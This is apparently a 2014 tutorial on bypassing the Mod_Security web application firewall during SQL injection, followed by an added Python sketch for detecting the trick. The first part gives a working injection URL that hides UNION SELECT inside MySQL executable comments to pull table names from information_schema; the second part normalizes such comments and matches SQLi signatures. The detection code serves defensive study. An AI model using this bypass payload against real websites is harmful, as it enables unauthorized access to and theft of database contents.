[TUTORIAL] Mod_Security bypass (SQLi)

Wednesday, February 26, 2014
Today I will show you how to bypass the Mod_Security WAF for an SQLi attack.
Most of you have probably run a query like UNION SELECT 1,2,3,4... and seen a message like "Not Acceptable!"
Take a look at the following picture:

[IMG]

This message is generated by a WAF called Mod_Security, and here is how you can bypass this WAF:

Code:
http://www.vulnsite.com/index.php?id=-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
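
For defenders: the request above gets past a rule that looks for the literal text UNION SELECT because each keyword is wrapped in a MySQL executable comment (/*!50000 ... */), which MySQL still runs as SQL. The Python sketch below is an added example, not code from the original post or from ModSecurity; its function and signature names are hypothetical. It unwraps those comments before matching, using the URL from this post as input.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request from this post, used as the sample input.
PAGE_URL = ("http://www.vulnsite.com/index.php?id=-13+/*!50000UNION*/+/*!50000SELECT*/+1,2,"
            "concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+"
            "/*!information_schema*/.tables+where+/*!table_schema*/=database()--+")

# Naive signature: the two keywords separated only by whitespace.
NAIVE = re.compile(r"union\s+select", re.I)

# MySQL executable comment: /*! <optional 5-digit version> body */
EXEC_COMMENT = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical signature set, applied only after normalization.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
}

def params(url):
    """URL-decoded (name, value) pairs of the query string."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)

def normalize(value):
    """Approximate the text MySQL will parse from a decoded parameter."""
    # Keep the body of executable comments: deleting every /* ... */
    # blindly would throw away the very keywords being looked for.
    value = EXEC_COMMENT.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)      # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", value).strip()

def naive_hits(url):
    """Parameters flagged by the literal-keyword rule on the decoded value."""
    return [name for name, value in params(url) if NAIVE.search(value)]

def inspect(url):
    """Map each parameter to the signatures matched after normalization."""
    hits = {}
    for name, value in params(url):
        norm = normalize(value)
        matched = sorted(k for k, rx in SIGNATURES.items() if rx.search(norm))
        if matched:
            hits[name] = matched
    return hits

if __name__ == "__main__":
    print("naive rule :", naive_hits(PAGE_URL))
    print("normalized :", inspect(PAGE_URL))
```

Normalized matching is defence in depth only; binding id as a query parameter (or casting it to an integer) in the application removes the injection itself.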
